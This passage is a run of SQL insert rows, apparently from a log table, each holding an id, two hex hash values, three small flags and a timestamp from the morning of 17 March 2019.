(71336, '9f52fe53818c382ad30c3e5071ab6be8', '9ed85e6813f67863', 0, 2, 1, '2019-03-17 06:19:04'),
(71337, '7c7bd9ff06915f96663d604fea90c9b8', 'b2c593c24117ba31', 0, 2, 1, '2019-03-17 06:19:22'),
(71338, '840e5cd2d8d66ca59fdabb92a5c900a1', 'e706e9a0184b2202', 0, 2, 1, '2019-03-17 06:19:24'),
(71339, '64c18a8ab83b7de17e054d9546749050', '332723ec6654d9f5', 0, 2, 1, '2019-03-17 06:19:33'),
(71340, '9f52fe53818c382ad30c3e5071ab6be8', '9ed85e6813f67863', 0, 2, 1, '2019-03-17 06:19:55'),
(71341, '61d97d02f90b2de0c124be9e11cd9ad6', '483313bcaa5a7274', 0, 2, 1, '2019-03-17 06:20:10'),
(71342, 'c7547ecf51443c3285d8047f57440fbd', '826ffa39fb70cfa6', 0, 2, 1, '2019-03-17 06:20:12'),
(71343, 'f5134bf2b970be673821514dcfccc43b', 'ef0ca87bfaada93e', 0, 2, 1, '2019-03-17 06:20:22'),
(71344, '3fe8295d162f6a2def37788b3f838177', '525abb4dc04ca54a', 0, 2, 1, '2019-03-17 06:20:24'),
(71345, 'c7547ecf51443c3285d8047f57440fbd', '826ffa39fb70cfa6', 0, 2, 1, '2019-03-17 06:20:29'),
(71346, '64dffddd4a679869ba75e80622fc51dd', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-03-17 06:20:29'),
(71347, '9f52fe53818c382ad30c3e5071ab6be8', '9ed85e6813f67863', 0, 2, 1, '2019-03-17 06:20:35'),
(71348, '2d4b65a63ff8fedebbd99cffad4b8511', 'c5b9fd5b72abf8c4', 0, 2, 1, '2019-03-17 06:20:38'),
(71349, 'c7547ecf51443c3285d8047f57440fbd', '826ffa39fb70cfa6', 0, 2, 1, '2019-03-17 06:20:39'),
(71350, '5463298ec1bb3c2eb4b7fe34b0b2312f', '3affdb6d237dd814', 0, 2, 1, '2019-03-17 06:20:47'),
(71351, '61d97d02f90b2de0c124be9e11cd9ad6', '483313bcaa5a7274', 0, 2, 1, '2019-03-17 06:20:58'),
(71352, 'ddc1d846f41cf67b975d38a25a2932f9', '3af9b7e4984c53a2', 0, 2, 1, '2019-03-17 06:21:03'),
(71353, '859e05cb4456d7ea4f5783653e763a69', '61a58b600e61b749', 0, 2, 1, '2019-03-17 06:21:12'),
(71354, '2d4b65a63ff8fedebbd99cffad4b8511', 'c5b9fd5b72abf8c4', 0, 2, 1, '2019-03-17 06:21:14'),
(71355, '9bb9e590cc9ef01c97bc8cf4abf94d5a', 'd982869195a81c84', 0, 2, 1, '2019-03-17 06:21:22'),
(71356, 'f5134bf2b970be673821514dcfccc43b', 'ef0ca87bfaada93e', 0, 2, 1, '2019-03-17 06:21:30'),
(71357, '61d97d02f90b2de0c124be9e11cd9ad6', '483313bcaa5a7274', 0, 2, 1, '2019-03-17 06:21:58'),
(71358, '1eb31a9c8c4df77bc7a910bde923ae01', 'abc5ec7aefe03208', 0, 2, 1, '2019-03-17 06:22:29'),
(71359, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-03-17 06:22:31'),
(71360, '2c8f6f7f2ab33a82415360a5f83c72b9', '9ead839ed439c136', 0, 2, 1, '2019-03-17 06:22:45'),
(71361, '93d48b368a89a35db018960464551139', 'c423a976f7958be7', 0, 2, 1, '2019-03-17 06:23:37'),
(71362, '51edeffed5ae83e47837c20e710f1783', '83f3f9050d0f12fd', 0, 2, 1, '2019-03-17 06:23:37'),
(71363, 'e0651e3cb94a87e14a3622d8b22eb6b3', '2515e33682073d44', 0, 2, 1, '2019-03-17 06:23:43'),
(71364, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-03-17 06:23:47'),
(71365, '64c18a8ab83b7de17e054d9546749050', '332723ec6654d9f5', 0, 2, 1, '2019-03-17 06:23:56'),
(71366, '51edeffed5ae83e47837c20e710f1783', '83f3f9050d0f12fd', 0, 2, 1, '2019-03-17 06:24:03'),
(71367, 'f5134bf2b970be673821514dcfccc43b', 'ef0ca87bfaada93e', 0, 2, 1, '2019-03-17 06:24:03'),
(71368, '6b1d55eaa88d2ffa4a232c49b39a9f78', 'd83be9192f556fc0', 0, 2, 1, '2019-03-17 06:24:14'),
(71369, '51edeffed5ae83e47837c20e710f1783', '83f3f9050d0f12fd', 0, 2, 1, '2019-03-17 06:24:28'),
(71370, '51edeffed5ae83e47837c20e710f1783', '83f3f9050d0f12fd', 0, 2, 1, '2019-03-17 06:24:43'),
(71371, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-03-17 06:24:47'),
(71372, 'f5134bf2b970be673821514dcfccc43b', 'ef0ca87bfaada93e', 0, 2, 1, '2019-03-17 06:24:54'),
(71373, '64c18a8ab83b7de17e054d9546749050', '332723ec6654d9f5', 0, 2, 1, '2019-03-17 06:24:56'),
(71374, '2d4b65a63ff8fedebbd99cffad4b8511', 'c5b9fd5b72abf8c4', 0, 2, 1, '2019-03-17 06:25:00'),
(71375, 'f5134bf2b970be673821514dcfccc43b', 'ef0ca87bfaada93e', 0, 2, 1, '2019-03-17 06:25:04'),
(71376, '6b1d55eaa88d2ffa4a232c49b39a9f78', 'd83be9192f556fc0', 0, 2, 1, '2019-03-17 06:25:17'),
(71377, '3f90b9bce74a1c3a2a0590d9bfec8855', '1624785298a8447a', 0, 2, 1, '2019-03-17 06:26:40'),
(71378, '3f90b9bce74a1c3a2a0590d9bfec8855', '1624785298a8447a', 0, 2, 1, '2019-03-17 06:26:54'),
(71379, '83accef9a3c769884602bf8e3c2f384f', 'f6269ce34ab6a362', 0, 2, 1, '2019-03-17 06:27:59'),
(71380, '73c58359188030558193bf0c773c4361', '50d02461c9e1908b', 0, 2, 1, '2019-03-17 06:28:22'),
(71381, '859e05cb4456d7ea4f5783653e763a69', '61a58b600e61b749', 0, 2, 1, '2019-03-17 06:30:05'),
(71382, '2e02b0fd9c12251be6af5fdb34f2f809', 'b75ecb2981287658', 0, 2, 1, '2019-03-17 06:31:44'),
(71383, '73c58359188030558193bf0c773c4361', '50d02461c9e1908b', 0, 2, 1, '2019-03-17 06:32:19'),
(71384, 'ea710023a9c27d68180b965839c2a0fa', '069827ca06c91db5', 0, 2, 1, '2019-03-17 06:33:08'),
(71385, 'ea710023a9c27d68180b965839c2a0fa', '069827ca06c91db5', 0, 2, 1, '2019-03-17 06:33:17'),
(71386, '45c326f0f8e5f4b53bc25ac325d9516f', '0b1466b4de9b8a16', 0, 2, 1, '2019-03-17 06:33:34'),
(71387, '279c8e0b4539319639e0b662478ff329', '1c68b977b911188c', 0, 2, 1, '2019-03-17 06:35:23'),
(71388, 'f5134bf2b970be673821514dcfccc43b', 'ef0ca87bfaada93e', 0, 2, 1, '2019-03-17 06:36:45'),
(71389, '166e6922b2f6366d943ca6fd798d253f', 'db225aff0722fa3e', 0, 2, 1, '2019-03-17 06:36:57'),
(71390, 'f5134bf2b970be673821514dcfccc43b', 'ef0ca87bfaada93e', 0, 2, 1, '2019-03-17 06:37:15'),
(71391, '93d48b368a89a35db018960464551139', 'c423a976f7958be7', 0, 2, 1, '2019-03-17 06:39:34'),
(71392, '14a377d9ea403677a75909137bdb73aa', '503a514a8daa32a7', 0, 2, 1, '2019-03-17 06:39:40'),
(71393, '2d4b65a63ff8fedebbd99cffad4b8511', 'c5b9fd5b72abf8c4', 0, 2, 1, '2019-03-17 06:39:47'),
(71394, 'e73d0b0009cdc03936dfb7f07d206f80', '3ae127420c119f0b', 0, 2, 1, '2019-03-17 06:41:08'),
(71395, 'e73d0b0009cdc03936dfb7f07d206f80', '3ae127420c119f0b', 0, 2, 1, '2019-03-17 06:41:39'),
(71396, 'f5134bf2b970be673821514dcfccc43b', 'ef0ca87bfaada93e', 0, 2, 1, '2019-03-17 06:42:28'),
(71397, 'e73d0b0009cdc03936dfb7f07d206f80', '3ae127420c119f0b', 0, 2, 1, '2019-03-17 06:42:36'),
(71398, 'e73d0b0009cdc03936dfb7f07d206f80', '3ae127420c119f0b', 0, 2, 1, '2019-03-17 06:43:13'),
(71399, 'e9fc5206f74a6251528a47934f7123de', '6406b85f20c1c00e', 0, 2, 1, '2019-03-17 06:43:36'),
(71400, '85cc52572f8b6f22cf84332e7b026c9c', 'da0989130d1f218b', 0, 2, 1, '2019-03-17 06:43:54'),
(71401, '85cc52572f8b6f22cf84332e7b026c9c', 'da0989130d1f218b', 0, 2, 1, '2019-03-17 06:44:13'),
(71402, 'a469f4726472afb9ddec9b2c73f92c90', 'd0275097fda69d9d', 0, 2, 1, '2019-03-17 06:45:00'),
(71403, 'a469f4726472afb9ddec9b2c73f92c90', 'd0275097fda69d9d', 0, 2, 1, '2019-03-17 06:47:03'),
(71404, 'e2a46819a16c64d90f79fb134bbcfa40', 'a48f9642f0aefc23', 0, 2, 1, '2019-03-17 06:47:16'),
(71405, '2fd3c85a247b8ca9034281d19f024f1e', 'f44ed019343ebf10', 0, 2, 1, '2019-03-17 06:48:46'),
(71406, '3c7e116600736e1886866711727f7c3b', '74aba437eea39f30', 0, 2, 1, '2019-03-17 06:49:40'),
(71407, 'a469f4726472afb9ddec9b2c73f92c90', 'd0275097fda69d9d', 0, 2, 1, '2019-03-17 06:49:49'),
(71408, '3869527c73292b061b59523bad95915b', '2cb8743142d7a1e8', 0, 2, 1, '2019-03-17 06:49:52'),
(71409, '5813b048cc37d6fdb89abce7a6ba166a', '624d6937076d1188', 0, 2, 1, '2019-03-17 06:51:22'),
(71410, '5463298ec1bb3c2eb4b7fe34b0b2312f', '3affdb6d237dd814', 0, 2, 1, '2019-03-17 06:52:32'),
(71411, 'c5cdbe6e391ceba211a4d00af5991d8d', 'c4c9002176fd8f74', 0, 2, 1, '2019-03-17 06:54:06'),
(71412, '6a4852ea98ef5b26950dc505c84029c1', '1d1658c97bef6ed6', 0, 2, 1, '2019-03-17 06:54:15'),
(71413, '6a4852ea98ef5b26950dc505c84029c1', '1d1658c97bef6ed6', 0, 2, 1, '2019-03-17 06:54:31'),
(71414, 'eea5e5179ee3196c5ffba66db1cc1fc4', 'd3aed25a15854edc', 0, 2, 1, '2019-03-17 06:55:09'),
(71415, '7a1239f47e06b9eef8b5bd813bcfeeef', '741f96188c7fe04b', 0, 2, 1, '2019-03-17 06:56:59'),
(71416, 'a7f4c5d0ad5683936ffd219ffd601627', 'f4daa31c6f826494', 0, 2, 1, '2019-03-17 06:57:44'),
(71417, 'ddc1d846f41cf67b975d38a25a2932f9', '3af9b7e4984c53a2', 0, 2, 1, '2019-03-17 06:57:58'),
(71418, '2bc32e1bfac01237c411756b7aa8f8d2', 'f19010d8a5f137d0', 0, 2, 1, '2019-03-17 07:01:15'),
(71419, '170f51497242074be84bff75715179df', 'ef33699b366746ed', 0, 2, 1, '2019-03-17 07:01:55'),
(71420, 'ce59c9837e1b0e1b0e8e439e46c00f8d', '57587ada79ea2aa6', 0, 2, 1, '2019-03-17 07:04:12'),
(71421, '98924e9bd28a9a70e99bd40542767a96', '65fb1a08fe2b5aab', 0, 2, 1, '2019-03-17 07:04:48'),
(71422, '4a012adce4302d0694acad36f0fabfe9', 'f6269ce34ab6a362', 0, 2, 1, '2019-03-17 07:06:08'),
(71423, '225be9ed0700aedb499205b7bbedf3b3', '00bc277736589866', 0, 2, 1, '2019-03-17 07:08:02'),
(71424, 'ce59c9837e1b0e1b0e8e439e46c00f8d', '57587ada79ea2aa6', 0, 2, 1, '2019-03-17 07:09:35'),
(71425, '633cc51105c978f0d8e907d77889e5e0', '02ad32d4972243fb', 0, 2, 1, '2019-03-17 07:11:27'),
(71426, 'c1ebe6d11f2e879d2030ea5e002a920a', '91d21119de46096c', 0, 2, 1, '2019-03-17 07:11:41'),
(71427, 'c1ebe6d11f2e879d2030ea5e002a920a', '91d21119de46096c', 0, 2, 1, '2019-03-17 07:11:52'),
(71428, '748abe97823fb4345f6d36b9af786e49', '19ac418837a1bfb6', 0, 2, 1, '2019-03-17 07:16:40'),
(71429, '1fd18ce9d4c33012adf8138e8e6c5d31', '68fcde0515352e44', 0, 2, 1, '2019-03-17 07:18:07'),
(71430, '1fd18ce9d4c33012adf8138e8e6c5d31', '68fcde0515352e44', 0, 2, 1, '2019-03-17 07:18:22'),
(71431, 'cf2d2567a574d785e259ec49038c6175', '324b9b48cb70ff46', 0, 2, 1, '2019-03-17 07:18:34'),
(71432, '9aef517bc523d2a9731d6cda9459c6d8', 'fa5c3b7d10b142d0', 0, 2, 1, '2019-03-17 07:19:23'),
(71433, '73c58359188030558193bf0c773c4361', '50d02461c9e1908b', 0, 2, 1, '2019-03-17 07:21:25'),
(71434, 'a469f4726472afb9ddec9b2c73f92c90', 'd0275097fda69d9d', 0, 2, 1, '2019-03-17 07:32:58'),
(71435, 'eea5e5179ee3196c5ffba66db1cc1fc4', 'd3aed25a15854edc', 0, 2, 1, '2019-03-17 07:33:40'),
(71436, '6e463ce4b16f5d85e85c1530a56a4c01', '1791b1aeb2327e22', 0, 2, 1, '2019-03-17 07:35:42'),
(71437, '067017f257e26ba316af6aa5711f331a', 'a1b34f30ff2aeea1', 0, 2, 1, '2019-03-17 07:39:32'),
(71438, '14a377d9ea403677a75909137bdb73aa', '503a514a8daa32a7', 0, 2, 1, '2019-03-17 07:39:37'),
(71439, '2d4b65a63ff8fedebbd99cffad4b8511', 'c5b9fd5b72abf8c4', 0, 2, 1, '2019-03-17 07:39:59'),
(71440, '2d4b65a63ff8fedebbd99cffad4b8511', 'c5b9fd5b72abf8c4', 0, 2, 1, '2019-03-17 07:41:32'),
(71441, '2d4b65a63ff8fedebbd99cffad4b8511', 'c5b9fd5b72abf8c4', 0, 2, 1, '2019-03-17 07:43:09'),
(71442, '5813b048cc37d6fdb89abce7a6ba166a', '624d6937076d1188', 0, 2, 1, '2019-03-17 07:43:33'),
(71443, '6a4852ea98ef5b26950dc505c84029c1', '1d1658c97bef6ed6', 0, 2, 1, '2019-03-17 07:43:34'),
(71444, '9991f167515bf2ddbf78c4c2f9a04336', '83f3f9050d0f12fd', 0, 2, 1, '2019-03-17 07:43:59'),
(71445, '9991f167515bf2ddbf78c4c2f9a04336', '83f3f9050d0f12fd', 0, 2, 1, '2019-03-17 07:44:18'),
(71446, 'ce59c9837e1b0e1b0e8e439e46c00f8d', '57587ada79ea2aa6', 0, 2, 1, '2019-03-17 07:44:27'),
(71447, '170f51497242074be84bff75715179df', 'ef33699b366746ed', 0, 2, 1, '2019-03-17 07:44:28'),
(71448, '12384e05a64a4727e13e37a006f95d1f', 'a30c08bfcb146c2b', 0, 2, 1, '2019-03-17 07:44:31'),
(71449, '9991f167515bf2ddbf78c4c2f9a04336', '83f3f9050d0f12fd', 0, 2, 1, '2019-03-17 07:44:38'),
(71450, '6a4852ea98ef5b26950dc505c84029c1', '1d1658c97bef6ed6', 0, 2, 1, '2019-03-17 07:44:40'),
(71451, 'ce59c9837e1b0e1b0e8e439e46c00f8d', '57587ada79ea2aa6', 0, 2, 1, '2019-03-17 07:44:43'),
(71452, '9991f167515bf2ddbf78c4c2f9a04336', '83f3f9050d0f12fd', 0, 2, 1, '2019-03-17 07:44:49'),
(71453, '12384e05a64a4727e13e37a006f95d1f', 'a30c08bfcb146c2b', 0, 2, 1, '2019-03-17 07:44:53'),
(71454, 'ce59c9837e1b0e1b0e8e439e46c00f8d', '57587ada79ea2aa6', 0, 2, 1, '2019-03-17 07:45:19'),
(71455, 'c76cfc0858520b3c9a9044aeb3ab4c0c', '1e8786f2f88c192b', 0, 2, 1, '2019-03-17 07:45:20'),
(71456, '6a4852ea98ef5b26950dc505c84029c1', '1d1658c97bef6ed6', 0, 2, 1, '2019-03-17 07:45:22'),
(71457, 'ce59c9837e1b0e1b0e8e439e46c00f8d', '57587ada79ea2aa6', 0, 2, 1, '2019-03-17 07:45:36'),
(71458, 'ea710023a9c27d68180b965839c2a0fa', '069827ca06c91db5', 0, 2, 1, '2019-03-17 07:45:38'),
(71459, 'ce59c9837e1b0e1b0e8e439e46c00f8d', '57587ada79ea2aa6', 0, 2, 1, '2019-03-17 07:45:55'),
(71460, '170f51497242074be84bff75715179df', 'ef33699b366746ed', 0, 2, 1, '2019-03-17 07:46:51'),
(71461, 'ce59c9837e1b0e1b0e8e439e46c00f8d', '57587ada79ea2aa6', 0, 2, 1, '2019-03-17 07:47:08'),
(71462, 'ddc1d846f41cf67b975d38a25a2932f9', '3af9b7e4984c53a2', 0, 2, 1, '2019-03-17 07:48:03'),
(71463, '6a4852ea98ef5b26950dc505c84029c1', '1d1658c97bef6ed6', 0, 2, 1, '2019-03-17 07:48:22'),
(71464, 'ce59c9837e1b0e1b0e8e439e46c00f8d', '57587ada79ea2aa6', 0, 2, 1, '2019-03-17 07:49:26'),
(71465, '279c8e0b4539319639e0b662478ff329', '1c68b977b911188c', 0, 2, 1, '2019-03-17 07:49:35'),
(71466, 'ce59c9837e1b0e1b0e8e439e46c00f8d', '57587ada79ea2aa6', 0, 2, 1, '2019-03-17 07:49:40'),
(71467, '6a4852ea98ef5b26950dc505c84029c1', '1d1658c97bef6ed6', 0, 2, 1, '2019-03-17 07:50:10'),
(71468, 'ec960b3b22de70cbf55c785a3f518b7f', '4f8f2dbd3b012e31', 0, 2, 1, '2019-03-17 07:50:41'),
(71469, 'ec960b3b22de70cbf55c785a3f518b7f', '4f8f2dbd3b012e31', 0, 2, 1, '2019-03-17 07:51:01'),
(71470, 'c1ebe6d11f2e879d2030ea5e002a920a', '91d21119de46096c', 0, 2, 1, '2019-03-17 07:51:09'),
(71471, '8623e2e1146ec1e7f68a5cb19719a75c', '81aa20345d9cca6d', 0, 2, 1, '2019-03-17 07:52:21'),
(71472, '6a4852ea98ef5b26950dc505c84029c1', '1d1658c97bef6ed6', 0, 2, 1, '2019-03-17 07:52:30'),
(71473, '3f91b620c074b7676d5e4247aa817e9b', 'd1c27eb4adc98518', 0, 2, 1, '2019-03-17 07:52:41'),
(71474, 'ea710023a9c27d68180b965839c2a0fa', '069827ca06c91db5', 0, 2, 1, '2019-03-17 07:52:53'),
(71475, '7c0f78fc8ebfd3711eab351c8601b051', 'f38dcdbdfd2da22b', 0, 2, 1, '2019-03-17 07:53:36'),
(71476, '170f51497242074be84bff75715179df', 'ef33699b366746ed', 0, 2, 1, '2019-03-17 07:58:58'),
(71477, '1aafc5ea80c9dec975c3897653e3d06c', 'f4daa31c6f826494', 0, 2, 1, '2019-03-17 07:59:29'),
(71478, 'ea710023a9c27d68180b965839c2a0fa', '069827ca06c91db5', 0, 2, 1, '2019-03-17 08:00:16'),
(71479, 'ea710023a9c27d68180b965839c2a0fa', '069827ca06c91db5', 0, 2, 1, '2019-03-17 08:00:49'),
(71480, '170f51497242074be84bff75715179df', 'ef33699b366746ed', 0, 2, 1, '2019-03-17 08:01:03'),
(71481, '7f3a227303676d0bda582658b28679b6', '980d9e3c5099d66b', 0, 2, 1, '2019-03-17 08:02:02'),
(71482, '1aafc5ea80c9dec975c3897653e3d06c', 'f4daa31c6f826494', 0, 2, 1, '2019-03-17 08:02:19'),
(71483, 'fa58cdeb6341aab3a3e3f1b2dcd4fe27', '0f82ee3c80278677', 0, 2, 1, '2019-03-17 08:02:28'),
(71484, 'fa58cdeb6341aab3a3e3f1b2dcd4fe27', '0f82ee3c80278677', 0, 2, 1, '2019-03-17 08:02:42'),
(71485, '16f02b759ecd0581591a3886fcb2e955', '89453d4a3741d6c0', 0, 2, 1, '2019-03-17 08:03:04'),
(71486, '1226d7325b504162f0437d372666c1d2', 'a4606350cb27c277', 0, 2, 1, '2019-03-17 08:03:22'),
(71487, '9c6884a37a94e081f16a0e7a72588acc', 'b4ecb18ba7992a18', 0, 2, 1, '2019-03-17 08:03:35'),
(71488, '9c6884a37a94e081f16a0e7a72588acc', 'b4ecb18ba7992a18', 0, 2, 1, '2019-03-17 08:03:58'),
(71489, 'ea710023a9c27d68180b965839c2a0fa', '069827ca06c91db5', 0, 2, 1, '2019-03-17 08:04:05'),
(71490, '9c6884a37a94e081f16a0e7a72588acc', 'b4ecb18ba7992a18', 0, 2, 1, '2019-03-17 08:04:17'),
(71491, '85ab82e22c67f899da9a490b0f4227c3', 'f556605047b35dd8', 0, 2, 1, '2019-03-17 08:04:24'),
(71492, '9c6884a37a94e081f16a0e7a72588acc', 'b4ecb18ba7992a18', 0, 2, 1, '2019-03-17 08:04:47'),
(71493, '9c6884a37a94e081f16a0e7a72588acc', 'b4ecb18ba7992a18', 0, 2, 1, '2019-03-17 08:05:20'),
(71494, '2e02b0fd9c12251be6af5fdb34f2f809', 'b75ecb2981287658', 0, 2, 1, '2019-03-17 08:05:23'),
(71495, '9c6884a37a94e081f16a0e7a72588acc', 'b4ecb18ba7992a18', 0, 2, 1, '2019-03-17 08:05:40'),
(71496, '170f51497242074be84bff75715179df', 'ef33699b366746ed', 0, 2, 1, '2019-03-17 08:05:41'),
(71497, '9c6884a37a94e081f16a0e7a72588acc', 'b4ecb18ba7992a18', 0, 2, 1, '2019-03-17 08:06:22'),
(71498, '170f51497242074be84bff75715179df', 'ef33699b366746ed', 0, 2, 1, '2019-03-17 08:06:24'),
(71499, '9c6884a37a94e081f16a0e7a72588acc', 'b4ecb18ba7992a18', 0, 2, 1, '2019-03-17 08:06:41'),
(71500, '170f51497242074be84bff75715179df', 'ef33699b366746ed', 0, 2, 1, '2019-03-17 08:07:06'),
(71501, 'ea710023a9c27d68180b965839c2a0fa', '069827ca06c91db5', 0, 2, 1, '2019-03-17 08:07:16'),
(71502, '16f02b759ecd0581591a3886fcb2e955', '89453d4a3741d6c0', 0, 2, 1, '2019-03-17 08:07:55'),
(71503, '9c6884a37a94e081f16a0e7a72588acc', 'b4ecb18ba7992a18', 0, 2, 1, '2019-03-17 08:08:07'),
(71504, 'b52c47a00e2b16e9007c405fc4fc8dc7', '99ddf52c8ba9b467', 0, 2, 1, '2019-03-17 08:08:13'),
(71505, '85ab82e22c67f899da9a490b0f4227c3', 'f556605047b35dd8', 0, 2, 1, '2019-03-17 08:08:16'),
(71506, '9c6884a37a94e081f16a0e7a72588acc', 'b4ecb18ba7992a18', 0, 2, 1, '2019-03-17 08:08:25'),
(71507, '9c6884a37a94e081f16a0e7a72588acc', 'b4ecb18ba7992a18', 0, 2, 1, '2019-03-17 08:09:09'),
(71508, '9c6884a37a94e081f16a0e7a72588acc', 'b4ecb18ba7992a18', 0, 2, 1, '2019-03-17 08:09:40'),
(71509, '3f91b620c074b7676d5e4247aa817e9b', 'd1c27eb4adc98518', 0, 2, 1, '2019-03-17 08:09:50'),
(71510, '9c6884a37a94e081f16a0e7a72588acc', 'b4ecb18ba7992a18', 0, 2, 1, '2019-03-17 08:10:07'),
(71511, 'ea710023a9c27d68180b965839c2a0fa', '069827ca06c91db5', 0, 2, 1, '2019-03-17 08:10:27'),
(71512, 'e8a159ede9677c4a00fc27afcbb738b9', 'ab50690254c8e403', 0, 2, 1, '2019-03-17 08:10:37'),
(71513, '9c6884a37a94e081f16a0e7a72588acc', 'b4ecb18ba7992a18', 0, 2, 1, '2019-03-17 08:10:42'),
(71514, 'ec960b3b22de70cbf55c785a3f518b7f', '4f8f2dbd3b012e31', 0, 2, 1, '2019-03-17 08:11:40'),
(71515, '748abe97823fb4345f6d36b9af786e49', '19ac418837a1bfb6', 0, 2, 1, '2019-03-17 08:11:53'),
(71516, '170f51497242074be84bff75715179df', 'ef33699b366746ed', 0, 2, 1, '2019-03-17 08:11:59'),
(71517, 'e8a159ede9677c4a00fc27afcbb738b9', 'ab50690254c8e403', 0, 2, 1, '2019-03-17 08:12:09'),
(71518, 'ea710023a9c27d68180b965839c2a0fa', '069827ca06c91db5', 0, 2, 1, '2019-03-17 08:13:16'),
(71519, '9c6884a37a94e081f16a0e7a72588acc', 'b4ecb18ba7992a18', 0, 2, 1, '2019-03-17 08:13:33'),
(71520, '21626c3b92466701a34fac0816da7692', 'b1f252ea7d591555', 0, 2, 1, '2019-03-17 08:13:58'),
(71521, 'ec960b3b22de70cbf55c785a3f518b7f', '4f8f2dbd3b012e31', 0, 2, 1, '2019-03-17 08:14:02'),
(71522, '8623e2e1146ec1e7f68a5cb19719a75c', '81aa20345d9cca6d', 0, 2, 1, '2019-03-17 08:14:07'),
(71523, '85ab82e22c67f899da9a490b0f4227c3', 'f556605047b35dd8', 0, 2, 1, '2019-03-17 08:14:15'),
(71524, '9c6884a37a94e081f16a0e7a72588acc', 'b4ecb18ba7992a18', 0, 2, 1, '2019-03-17 08:14:35'),
(71525, '6a4852ea98ef5b26950dc505c84029c1', '1d1658c97bef6ed6', 0, 2, 1, '2019-03-17 08:14:41'),
(71526, 'ea710023a9c27d68180b965839c2a0fa', '069827ca06c91db5', 0, 2, 1, '2019-03-17 08:14:42'),
(71527, '9c6884a37a94e081f16a0e7a72588acc', 'b4ecb18ba7992a18', 0, 2, 1, '2019-03-17 08:14:50'),
(71528, '8623e2e1146ec1e7f68a5cb19719a75c', '81aa20345d9cca6d', 0, 2, 1, '2019-03-17 08:14:52'),
(71529, '8623e2e1146ec1e7f68a5cb19719a75c', '81aa20345d9cca6d', 0, 2, 1, '2019-03-17 08:15:00'),
(71530, '8623e2e1146ec1e7f68a5cb19719a75c', '81aa20345d9cca6d', 0, 2, 1, '2019-03-17 08:15:14'),
(71531, '4f8846fbcb25d13f45e9706f312481b0', '980d9e3c5099d66b', 0, 2, 1, '2019-03-17 08:15:16'),
(71532, '3f91b620c074b7676d5e4247aa817e9b', 'd1c27eb4adc98518', 0, 2, 1, '2019-03-17 08:15:36'),
(71533, '4f8846fbcb25d13f45e9706f312481b0', '980d9e3c5099d66b', 0, 2, 1, '2019-03-17 08:15:38'),
(71534, 'ea710023a9c27d68180b965839c2a0fa', '069827ca06c91db5', 0, 2, 1, '2019-03-17 08:15:47'),
(71535, 'c1ebe6d11f2e879d2030ea5e002a920a', '91d21119de46096c', 0, 2, 1, '2019-03-17 08:16:32'),
(71536, 'ce59c9837e1b0e1b0e8e439e46c00f8d', '57587ada79ea2aa6', 0, 2, 1, '2019-03-17 08:17:24'),
(71537, 'e4ff6dc9b001632282823a0e3393a945', 'a7023c9e8bf417df', 0, 2, 1, '2019-03-17 08:17:36'),
(71538, 'ce59c9837e1b0e1b0e8e439e46c00f8d', '57587ada79ea2aa6', 0, 2, 1, '2019-03-17 08:17:37'),
(71539, 'ce59c9837e1b0e1b0e8e439e46c00f8d', '57587ada79ea2aa6', 0, 2, 1, '2019-03-17 08:17:59'),
(71540, 'e4ff6dc9b001632282823a0e3393a945', 'a7023c9e8bf417df', 0, 2, 1, '2019-03-17 08:18:12'),
(71541, '9c6884a37a94e081f16a0e7a72588acc', 'b4ecb18ba7992a18', 0, 2, 1, '2019-03-17 08:18:20'),
(71542, 'e4ff6dc9b001632282823a0e3393a945', 'a7023c9e8bf417df', 0, 2, 1, '2019-03-17 08:18:47'),
(71543, '9c6884a37a94e081f16a0e7a72588acc', 'b4ecb18ba7992a18', 0, 2, 1, '2019-03-17 08:18:49'),
(71544, '9193dab9bf04540a5b4f62dd3b916fb6', 'f44ed019343ebf10', 0, 2, 1, '2019-03-17 08:19:06'),
(71545, 'dba216c356954601cca1ff993e384481', 'f8d002c7b8b76490', 0, 2, 1, '2019-03-17 08:19:12'),
(71546, 'ce59c9837e1b0e1b0e8e439e46c00f8d', '57587ada79ea2aa6', 0, 2, 1, '2019-03-17 08:19:14'),
(71547, 'e8a159ede9677c4a00fc27afcbb738b9', 'ab50690254c8e403', 0, 2, 1, '2019-03-17 08:19:14'),
(71548, '9c6884a37a94e081f16a0e7a72588acc', 'b4ecb18ba7992a18', 0, 2, 1, '2019-03-17 08:19:21'),
(71549, 'dba216c356954601cca1ff993e384481', 'f8d002c7b8b76490', 0, 2, 1, '2019-03-17 08:19:50'),
(71550, '4f8846fbcb25d13f45e9706f312481b0', '980d9e3c5099d66b', 0, 2, 1, '2019-03-17 08:19:53'),
(71551, 'e8a159ede9677c4a00fc27afcbb738b9', 'ab50690254c8e403', 0, 2, 1, '2019-03-17 08:20:00'),
(71552, 'ea710023a9c27d68180b965839c2a0fa', '069827ca06c91db5', 0, 2, 1, '2019-03-17 08:20:03'),
(71553, '9c6884a37a94e081f16a0e7a72588acc', 'b4ecb18ba7992a18', 0, 2, 1, '2019-03-17 08:20:04'),
(71554, '6a4852ea98ef5b26950dc505c84029c1', '1d1658c97bef6ed6', 0, 2, 1, '2019-03-17 08:20:43'),
(71555, '1c2f3c8a90514ffcd16ba4b0ceafa1bf', 'c82195f7827b9487', 0, 2, 1, '2019-03-17 08:21:01'),
(71556, 'dba216c356954601cca1ff993e384481', 'f8d002c7b8b76490', 0, 2, 1, '2019-03-17 08:21:23'),
(71557, '1c2f3c8a90514ffcd16ba4b0ceafa1bf', 'c82195f7827b9487', 0, 2, 1, '2019-03-17 08:21:26'),
(71558, '9c6884a37a94e081f16a0e7a72588acc', 'b4ecb18ba7992a18', 0, 2, 1, '2019-03-17 08:21:48'),
(71559, 'dba216c356954601cca1ff993e384481', 'f8d002c7b8b76490', 0, 2, 1, '2019-03-17 08:22:06'),
(71560, '170f51497242074be84bff75715179df', 'ef33699b366746ed', 0, 2, 1, '2019-03-17 08:23:08'),
(71561, '15c8ba60a9bc8cedb65748f109034aac', '4ae0e6974a830cbf', 0, 2, 1, '2019-03-17 08:23:09'),
(71562, '75e1b2f7fe32583207c395b679bd4f66', 'eb2854fabd57280d', 0, 2, 1, '2019-03-17 08:24:01'),
(71563, '6a4852ea98ef5b26950dc505c84029c1', '1d1658c97bef6ed6', 0, 2, 1, '2019-03-17 08:24:08'),
(71564, '170f51497242074be84bff75715179df', 'ef33699b366746ed', 0, 2, 1, '2019-03-17 08:24:22'),
